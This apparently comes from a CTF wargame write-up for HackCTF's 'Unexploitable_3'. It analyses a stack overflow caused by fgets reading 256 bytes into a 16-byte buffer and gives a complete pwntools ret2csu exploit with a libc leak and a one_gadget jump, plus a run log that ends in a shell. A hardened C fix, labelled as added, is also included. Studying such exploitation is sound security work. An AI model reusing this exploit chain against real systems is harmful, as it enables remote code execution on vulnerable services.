[HackCTF / pwnable] Unexploitable_3

2019. 12. 9. 09:27 | Wargame & CTF/HackCTF

HackCTF - Unexploitable_3

Summary

  • 64bit

  • rtc

Analysis

int __cdecl main(int argc, const char **argv, const char **envp)
{
 char s; // [rsp+0h] [rbp-10h]

 setvbuf(stdout, 0LL, 2, 0LL);
 setvbuf(stdin, 0LL, 2, 0LL);
 fwrite("Impossible RTL ha? Nothing for you!\n", 1uLL, 0x24uLL, stdout);
 fgets(&s, 256, stdin);
 return 0;
}

fgets reads up to 256 bytes into s, but s is only a 16-byte stack buffer (rbp-0x10), so the saved rbp and return address get overwritten. The plan is to leak the address of setvbuf with fwrite and then jump to a one-shot gadget.

Return-to-csu alone can only set up three arguments. Looking through the gadgets, there is a mov rcx, qword ptr [rdi] ; ret gadget; that one can be used to set fwrite's fourth argument (the stdout FILE pointer).
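The bug is purely a size mismatch: fgets is told the buffer holds 256 bytes while s is 16 bytes. Below is an added, hardened counterpart to the challenge's main() (not code from the original post or the challenge binary) that passes the real buffer size and drains the leftover input; the fmemopen-based probe, the guard word and the sample inputs are constructed for this example.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

/* Hardened replacement for the challenge's fgets(&s, 256, stdin): the
 * bound handed to fgets is the real capacity of the buffer, so an
 * over-long line is truncated instead of running into the saved rbp
 * and return address. Bytes that did not fit are drained so they do
 * not spill into the next read. Returns the stored length (without
 * the newline) or -1 on EOF/error. */
int read_line(char *buf, size_t cap, FILE *in)
{
    if (cap == 0 || fgets(buf, (int)cap, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';                 /* strip the newline */
    } else {
        int c;                             /* line was cut: discard the rest */
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return (int)len;
}

/* Same shape as the challenge's main(), with the bound fixed:
 * sizeof s (16) instead of the hard-coded 256. */
int challenge_main_fixed(FILE *in, FILE *out)
{
    char s[16];
    fputs("Impossible RTL ha? Nothing for you!\n", out);
    return read_line(s, sizeof s, in) < 0 ? 1 : 0;
}

/* Probe (constructed for this example): feeds `input` through read_line
 * into a 16-byte buffer that sits directly in front of a guard word
 * standing in for the saved frame. Returns the stored length, or -1 if
 * the read failed or the guard was modified. */
int probe_bounded_read(const char *input)
{
    struct { char buf[16]; unsigned long guard; } frame;
    const unsigned long sentinel = 0x0123456789abcdefUL;
    frame.guard = sentinel;
    memset(frame.buf, 0, sizeof frame.buf);
    FILE *in = fmemopen((void *)input, strlen(input), "r");
    if (in == NULL)
        return -1;
    int n = read_line(frame.buf, sizeof frame.buf, in);
    fclose(in);
    return frame.guard == sentinel ? n : -1;
}
```

With the original 256 bound the 40-byte line in the probe would reach past the buffer; with sizeof the buffer it is cut to 15 bytes and the guard stays intact.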

Exploit

from pwn import *

e = ELF("./Unexploitable_3")
#p = process("./Unexploitable_3")
p = remote("ctf.j0n9hyun.xyz", 3034)
libc = e.libc

oneshot = 0x45216                   # one_gadget offset in the remote libc
pop_rdi_ret = 0x0000000000400743
gadget = 0x0000000000400658         # mov rcx, qword ptr [rdi] ; ret

p.recvuntil(b"Impossible RTL ha? Nothing for you!\n")

pause()

# 16-byte buffer + saved rbp
payload = b""
payload += b"A" * (0x10 + 0x8)

# stage 1: fwrite(e.got["setvbuf"], 1, 8, stdout)
# rcx (4th argument) = *(&stdout) via the mov rcx, [rdi] gadget
payload += p64(pop_rdi_ret)
payload += p64(e.symbols["stdout"])
payload += p64(gadget)

# __libc_csu_init+90: pop rbx, rbp, r12, r13, r14, r15 ; ret
payload += p64(e.symbols["__libc_csu_init"] + 90)
payload += p64(0x0)                 # rbx = 0
payload += p64(0x1)                 # rbp = 1 (loop exits after one call)
payload += p64(e.got["fwrite"])     # r12 -> call [r12 + rbx*8]
payload += p64(0x8)                 # r13 -> rdx = 8 (nmemb)
payload += p64(0x1)                 # r14 -> rsi = 1 (size)
payload += p64(e.got["setvbuf"])    # r15 -> edi = ptr to leak

# __libc_csu_init+64: set args, call [r12+rbx*8], then add rsp,8 ; 6 pops ; ret
payload += p64(e.symbols["__libc_csu_init"] + 64)
payload += p64(0x0)                 # consumed by add rsp, 8
payload += p64(0x0)                 # rbx
payload += p64(0x0)                 # rbp
payload += p64(0x0)                 # r12
payload += p64(0x0)                 # r13
payload += p64(0x0)                 # r14
payload += p64(0x0)                 # r15

# return to main for a second overflow
payload += p64(e.symbols["main"])

p.sendline(payload)

# leaked GOT entry: take the 6 significant bytes of the libc pointer
setvbuf_add = u64(p.recvuntil(b"\x7f")[-6:] + b"\x00\x00")
libc_base = setvbuf_add - libc.symbols["setvbuf"]

# stage 2: overwrite the return address with the one-shot gadget
payload = b""
payload += b"A" * (0x10 + 0x8)
payload += p64(libc_base + oneshot)

p.sendline(payload)

p.interactive()

Flag

cg10036@cg10036-virtual-machine:~/CTF/hackCTF/Unexploitable_3$ p ex.py 
[*] '/home/cg10036/CTF/hackCTF/Unexploitable_3/Unexploitable_3'
  Arch:     amd64-64-little
  RELRO:   Partial RELRO
  Stack:   No canary found
  NX:       NX enabled
  PIE:     No PIE (0x400000)
[+] Opening connection to ctf.j0n9hyun.xyz on port 3034: Done
[*] '/lib/x86_64-linux-gnu/libc.so.6'
  Arch:     amd64-64-little
  RELRO:   Partial RELRO
  Stack:   Canary found
  NX:       NX enabled
  PIE:     PIE enabled
[*] Paused (press any to continue)
[*] Switching to interactive mode
\x00\x00Impossible RTL ha? Nothing for you!
$ cat flag
HackCTF{bss_4lw4y5_h4s_std1n/std0ut}
